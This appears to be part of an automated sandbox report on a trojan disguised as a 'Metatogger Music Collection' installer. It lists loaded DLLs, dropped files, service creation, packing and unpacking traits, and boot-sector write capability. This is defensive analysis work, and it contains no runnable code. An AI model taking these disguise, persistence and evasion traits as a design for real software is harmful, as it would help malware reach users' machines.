        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeSection loaded: netutils.dllJump to behavior
        Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: metatoggermusiccollection.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: WWAN_MobileFixup 2.33.197.66.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@7/27@1/2
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AE08B8 FormatMessageA,GetLastError,4_2_02AE08B8
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_0040936C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00453D4C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00453D4C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00454574 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00454574
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: CreateServiceA,CloseServiceHandle,3_2_00402572
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: CreateServiceA,CloseServiceHandle,4_2_00402572
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409AD0 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409AD0
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 3_2_00402345 StartServiceCtrlDispatcherA,3_2_00402345
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 3_2_00402345 StartServiceCtrlDispatcherA,3_2_00402345
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_00402345 StartServiceCtrlDispatcherA,4_2_00402345
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music CollectionJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: file.exeVirustotal: Detection: 8%
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp" /SL5="$20446,1681617,54272,C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess created: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -i
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess created: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -s
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp" /SL5="$20446,1681617,54272,C:\Users\user\Desktop\file.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess created: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -iJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess created: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: file.exeStatic file information: File size 2049145 > 1048576

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeUnpacked PE file: 3.2.metatoggermusiccollection.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_char2_:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeUnpacked PE file: 4.2.metatoggermusiccollection.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_char2_:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeUnpacked PE file: 3.2.metatoggermusiccollection.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeUnpacked PE file: 4.2.metatoggermusiccollection.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00447DC0 LoadLibraryExA,LoadLibraryA,GetProcAddress,1_2_00447DC0
        Source: metatoggermusiccollection.exe.1.drStatic PE information: section name: _char2_
        Source: is-7CP2O.tmp.1.drStatic PE information: section name: /4
        Source: is-QO8P8.tmp.1.drStatic PE information: section name: /4
        Source: is-2EOVT.tmp.1.drStatic PE information: section name: /4
        Source: is-JTEEN.tmp.1.drStatic PE information: section name: /4
        Source: is-6VPG9.tmp.1.drStatic PE information: section name: /4
        Source: is-OSHRA.tmp.1.drStatic PE information: section name: /4
        Source: WWAN_MobileFixup 2.33.197.66.exe.3.drStatic PE information: section name: _char2_
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406518 push 00406555h; ret 0_2_0040654D
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408028 push ecx; mov dword ptr [esp], eax0_2_0040802D
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408E5C push 00408E8Fh; ret 0_2_00408E87
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004098B4 push 004098F1h; ret 1_2_004098E9
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0047E194 push 0047E272h; ret 1_2_0047E26A
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0045C1BC push ecx; mov dword ptr [esp], eax1_2_0045C1C1
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00410640 push ecx; mov dword ptr [esp], edx1_2_00410645
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0040A6C8 push esp; retf 1_2_0040A6D1
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00430700 push ecx; mov dword ptr [esp], eax1_2_00430705
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00412898 push 004128FBh; ret 1_2_004128F3
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00442CD4 push ecx; mov dword ptr [esp], ecx1_2_00442CD8
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00450C80 push 00450CB3h; ret 1_2_00450CAB
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00472D24 push ecx; mov dword ptr [esp], edx1_2_00472D25
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0040CF98 push ecx; mov dword ptr [esp], edx1_2_0040CF9A
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0040F4F8 push ecx; mov dword ptr [esp], edx1_2_0040F4FA
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004576DC push 00457720h; ret 1_2_00457718
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0047F7E8 push ecx; mov dword ptr [esp], ecx1_2_0047F7ED
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00419B98 push ecx; mov dword ptr [esp], ecx1_2_00419B9D
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00455E70 push 00455EA8h; ret 1_2_00455EA0
        Source: metatoggermusiccollection.exe.1.drStatic PE information: section name: .text entropy: 7.660185314454046
        Source: WWAN_MobileFixup 2.33.197.66.exe.3.drStatic PE information: section name: .text entropy: 7.660185314454046

        Persistence and Installation Behavior

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive04_2_00401A4F
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive04_2_02ADF7D6
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-JTEEN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-7CP2O.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeFile created: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\libvorbis-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-OSHRA.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-B2M6R.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\libogg-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-QO8P8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Metatogger Music Collection\libbz2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeFile created: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exeJump to dropped file

        Boot Survival

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive04_2_00401A4F
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive04_2_02ADF7D6
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 3_2_00402345 StartServiceCtrlDispatcherA,3_2_00402345
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423B7C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423B7C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0042414C IsIconic,SetActiveWindow,SetFocus,1_2_0042414C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00424104 IsIconic,SetActiveWindow,1_2_00424104
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004182F4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_004182F4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004227CC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_004227CC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00417508 IsIconic,GetCapture,1_2_00417508
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0047DB50 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0047DB50
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00417C40 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417C40
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00417C3E IsIconic,SetWindowPos,1_2_00417C3E
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0044AEEC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEEC
        Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
